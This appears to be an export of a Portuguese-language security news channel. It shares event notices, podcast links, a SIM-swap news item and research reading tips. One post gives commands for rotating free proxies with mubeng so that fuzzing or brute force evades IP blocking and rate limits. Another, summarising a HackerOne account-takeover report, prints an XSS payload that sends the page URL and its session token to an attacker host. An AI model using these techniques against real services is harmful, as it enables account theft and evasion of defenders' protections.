OK, ok. Não julgo mais aqueles CTFs que escondiam dados em imagens, parece que no mundo real isso realmente é usado.
👾 Tópico aleatório
Qual foi o último Github que visitou / clonou OU a última ferramenta que executo OU o último artigo que leu OU o último vídeo de cibersec que assistiu?
A FIAP vai fazer um evento sobre cibersegurança automotiva, um tema bem escasso aqui no Brasil ainda.

Vai ocorrer dia 08 desse mês (terça-feira)
19hs-20hs (1 hora de duração)

Link do evento: https://www.linkedin.com/events/fiapmeetup-ciberseguran-aautomo7346254640864288768

Link post original: https://www.linkedin.com/posts/augusto-zanotti-998161248_cybersecurity-ciberseguranaexaautomotiva-activity-7346487995698405377-ic5c

Curtiu? Vai participar? Quer ver a opinião da galera? Comenta nesse post =)
Já to assistindo aqui. Quem quiser dar uma olhada nesse episódio, vale demais.
O entrevistado é o cangaceiro, uma pessoa muito gente boa, de fácil acesso mesmo e que tem experiência em bugbounty.

Fora isso o próprio canal (DevSecOps Podcast) é muito bom e eu volta e meia vejo vídeos deles, pois tende para o lado mais da galera de DEV e eu sempre quero ficar ouvindo o que essa galera tá pensando (pra gente ver onde eles tão olhando, o que estão estudando e principalmente: o que não estão vendo -> para que possamos achar com + facilidade vulnerabilidade nas aplicações)

Link pro vídeo -> https://www.youtube.com/watch?si=iCY0nwwoVRhEoing&v=Lw6oYGk_mFU&feature=youtu.be
Saiu o vídeo com o Rhynorater!
Assistam por mim. Quando eu estiver em casa com certeza vou ver.
Esse cara é muito bom tecnicamente

https://youtu.be/DX98GmHahwA
At&t habilita funcionalidade que previne a troca forçada do SIM (ataque de sim swap), ainda que parta de um funcionário da at&t. Verizon já possui essa funcionalidade a 5 anos.

Mais info: https://www.bleepingcomputer.com/news/security/atandt-rolls-out-wireless-lock-feature-to-block-sim-swap-attacks/amp/
E essa história de uma música de 1989 que continha uma "CVE"? A frequência usada na música tinha a capacidade de danificar discos rígidos. Loucura hahaha. A CVE foi registrada em 2022 sob o registro CVE-2022-38392

Post original: https://www.linkedin.com/posts/bevanlane-infosec_during-my-research-on-the-history-of-hacking-activity-7346085242098671617-h5fC
Pode confessar e reagir aí que já aconteceu contigo
Precisa contornar um bloqueio de Ip / rate limiting pra fazer aquele fuzzing / brute force e não quer usar o lambda da AWS pra não gastar grana, nem proxychains que pode ser muito lento e instável?

Quer fazer uma rotação de Ip de graça?

Baixa uma lista de proxies recentes e válidos:

curl -sf 'https://raw.githubusercontent.com/TheSpeedX/PROXY-List/refs/heads/master/http.txt' | sed 's#^#http://#g' > http_proxies.txt

Execute o mubeng (link do repositório pra instalação ao final:
mubeng -f http_proxies.txt --remove-on-error -a :8081 -w


pronto, agora pode redirecionar todo trafego das tuas ferramentas pro http://127.0.0.1:8081 que ele vai se encarregar de distribuir as requisições entre todos os proxies carregados, independente do método HTTP, (post, get, options, delete, etc).

ffuf -u http://examplo.com/FUZZ -w wordlist.txt -x http://127.0.0.1:8081

Além disso, assim que um proxy falhar o mubeng vai remover ele da pool de proxies disponiveis. Ah outra coisa, a flag -r fala quantas requisicoes aquele proxy pode fazer uma vez que ele for escolhido aleatoriamente. Eu nao setei nada por que por default é zero o valor, então cada requisição sairá de um novo IP.

Até a próxima

https://github.com/mubeng/mubeng GitHub - mubeng/mubeng: An incredibly fast proxy checker & IP rotator with ease.
A escalada de impacto de uma vulnerabilidade pode ser demonstrada pelo caso de Account Takeover na Hostinger. A exploração encadeou duas falhas distintas:

* Um Reflected XSS em um subdomínio de baixo impacto e FORA do escopo: marketing.hostinger.com.

* Uma Validação de Redirecionamento Imprópria no sistema de autenticação (auth.hostinger.com), que permitia redirecionar para o subdomínio vulnerável por ele estar em uma whitelist.

O ataque consistiu em criar uma URL para o sistema de autenticação que, após o login da vítima, a redirecionava para a página com o XSS. O próprio sistema de login anexava o auth_token da sessão do usuário à URL de redirecionamento.

Ao carregar a página, o payload do XSS era executado para exfiltrar o token:

<script>fetch('URL_DO_ATACANTE', {method: 'POST', body: window.location});</script>

O script envia a URL completa (window.location), que agora continha o token, para um servidor controlado pelo atacante. A posse deste token permitia o controle total da conta da vítima (ATO).

Dessa forma, um XSS de baixo risco foi transformado em uma vulnerabilidade crítica através de uma cadeia de exploração.

Link para o relatório: https://hackerone.com/reports/3081691
Tirem 30 minutos do dia para ler essa pesquisa e como acharam 3 CVEs na adobe (AEM).
O massa é a linha de raciocínio usada a cada novo obstáculo. A paciência de ler documentações. A descoberta de como tecnologias terceiras funcionam naquela integração. As correções não efetivas aplicadas pelo time. Sempre que tiver um regex, abra mais ainda os olhos

Boa leitura 🎅

https://slcyber.io/assetnote-security-research-center/how-we-got-persistent-xss-on-every-aem-cloud-site-thrice/
Zeroc00i News & Tricks
O spaceraccoonsec (Eugene Lim) acabou de soltar um material à venda From Day Zero to Zero Day A Hands-On Guide to Vulnerability Research https://nostarch.com/zero-day Ebook, $47.99 Print Book (PREORDER) and EARLY ACCESS Ebook, $59.99 Talk dele: THREAT…
Eu não consegui tirar esse livro da cabeça. Vários e vários dias eu lembrava dele.

Tomei uma decisão hoje e resolvi investir e comprar ele. Deu 300 e poucos o PDF (acesso prévio) + versão impressa

Eu já li uma parte de um capítulo e é nítida a diferença quando um real pesquisador de segurança fala de segurança. As vezes em uma página já te da um insight pra pesquisar coisas por 1 dia inteiro.
Vi ontem essa noticia sobre o gemini CLI (pra terminal) e acabei esquecendo de compartilhar aqui. Vou fazer esse teste logo mais. Essa batalha das IAs é sempre boa.
Artigo para ler depois ++

https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/

O artigo é crucial, pois expõe "footguns" específicas e exploráveis nos parsers Go, detalhando como payloads (ex: com case variado, chaves duplicadas, formatos mistos) podem levar a bypass de segurança. Aprofunde-se no artigo para exemplos de código, explorações e a tabela de comportamentos dos parsers.

(Valeu Teles pela indicação)
Unexpected security footguns in Go's parsers
O burp é um pai pra nós
Zeroc00i News & Tricks
É impressionante que sempre que esse cara posta algo: pode sentar e tirar uns minutos porquê vai sair coisa boa. https://slcyber.io/assetnote-security-research-center/novel-ssrf-technique-involving-http-redirect-loops/ This drove us nuts. Was there something…
O podcast Critical Thinking acabou de lançar esse episódio:

New Research in Blind SSRF and Self-XSS, and How to Architect Source-code Review AI Bots (Ep. 128)


Onde citam a pesquisa do Shubs, que compartilhei aqui.
Tô dizendo, estar nesse grupo é só conteúdo bom pra ti hahaha. tmj

https://www.youtube.com/watch?v=jPN2GE-umJY
Back to Top